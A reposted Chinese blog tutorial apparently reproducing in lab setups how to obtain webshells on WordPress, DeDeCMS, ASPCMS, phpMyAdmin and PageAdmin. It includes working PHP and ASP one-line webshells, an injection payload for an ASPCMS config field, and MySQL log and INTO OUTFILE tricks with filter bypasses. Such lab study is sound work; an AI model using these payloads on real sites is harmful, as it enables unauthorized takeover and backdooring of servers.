欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > 【复现】常见CMS漏洞

【复现】常见CMS漏洞

2024/11/30 10:34:48 来源:https://blog.csdn.net/m0_59151303/article/details/140909589  浏览:    关键词:【复现】常见CMS漏洞

一: WordPress

姿势一:后台修改模板拿WebShel

进入后台:

img

外观-编辑-404模板-一句话木马

img

/wp-content/themes/twentyfourteen/404.php

img

菜刀连接:

img

姿势二:上传主题拿WebShell

将主题404.php替换

img

外观-添加主题

img

img

蚁剑连接

img

二: DeDeCMS

姿势一:通过文件管理器上传WebShell

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好

#执行命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://192.168.4.176:8080/wp-admin/

image-20240804160121563

步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…OK

image-20240804160646817

image-20240804160756287

步骤三:访问上传成功后的文件并使用蚁剑连接测试…

image-20240804161043601

image-20240804160927407

姿势二:修改模板文件拿WebShell

步骤一:与WPCMS类似,直接修改模板拿WebShell…点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…如下

image-20240804161204555

image-20240804161324616

步骤二:点击【生成】–》【更新主页HTML】--》将主页位置修改为【…/index.php】–》点击【生成静态】–》点击【更新主页】再次访问站点首页可发现变化

image-20240804162638942

image-20240804162759660

步骤三:使用蚁剑进行连接测

image-20240804162825088

姿势三:后台任意命令执行拿WebShell

步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】

image-20240804163051099

步骤二:点击【代码】–》在图中显示的路径与站点进行拼接…访问测试!

image-20240804163208350

image-20240804163222419

image-20240804164850740

步骤三:使用蚁剑连接测试

image-20240804164909072

三: ASPCMS

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS…并登陆到后台(这里注意在搭建站点的时候注意权限问题)

#网站后台
http://192.168.204.141/admin_aspcms/login.asp //全功能版本
#账户密码
username:admin
password:123456

image-20240804152116578

步骤二:点击【扩展功能】–》【幻灯片设置】--》点击【保存】--》开启代理进行抓包

image-20240804152521453

步骤三:在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包查看被修改的asp文件内容

#字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a
#影响文件
/config/AspCms_Config.asp

image-20240804152654255

步骤三:访问以下地址进行连接

http://192.168.204.144/config/AspCms_Config.asp

image-20240804153025590

四: PhPMyadmin

姿势一:通过日志文件拿Shel

利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell

show global variables like '%general%';
set global general_log='on'; //日志保存状态开启;
set global general_log_file = 'D:/Pro/phpstudy_pro/WWW/mafa.php' //修
改日志的保存位置。
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
bypass:
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

image-20240804153623518

image-20240804153657553

image-20240804153721254

image-20240804153745561

image-20240804153913637

image-20240804153944750

image-20240804154050764

image-20240804154429742

姿势二:导入导出拿WebShel

思路:通过SQL语句拿webshell 用 into outfile 把后门写到网站目录上。

my.ini需要添加secure_file_priv=''这个配置

1.首先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'D:/Pro/phpstudy_pro/WWW/b.php';
select "<?php system($_GET[a]);?>" into outfile 'D:/Pro/phpstudy_pro/WWW/b.php';
4.浏览器
http://127.0.0.1/b.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'D:/Pro/phpstudy_pro/WWW/b.php';
备注:/
不要用\,如里要用\\(转义)

image-20240804155005008

image-20240804155042126

姿势三:界面图像化GetShell
phpmyadmin管理台
变量:日志 搜索:gen
log:on
file:D:/Pro/phpstudy_pro/WWW/c.php
sql:
select "<?php eval($_POST[a]);?>";

可以通过图像化来修改日志文件,和姿势一差不多

image-20240804155203659

五: Pageadmin

姿势一:上传模块拿WebShell

步骤一:访问pageadmin在后台可以上传模板,把webshell打包成zip上传模板,系统会自动解压,成功会在后台存在后门,访问即可获取webshell 。 点击【应用】–》【 插件安装】–》【 上传文件】

image-20240804150815510

这里因为不是授权版本,无法上传,如果有授权版本的话就可以成功上传,上传后系统会自动解压,直
接访问shell地址就可以了:/Templates/shell/shell.aspx

姿势二:上传文件解压拿WebShell

步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】

image-20240804150939343

image-20240804151011054

image-20240804151212270

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com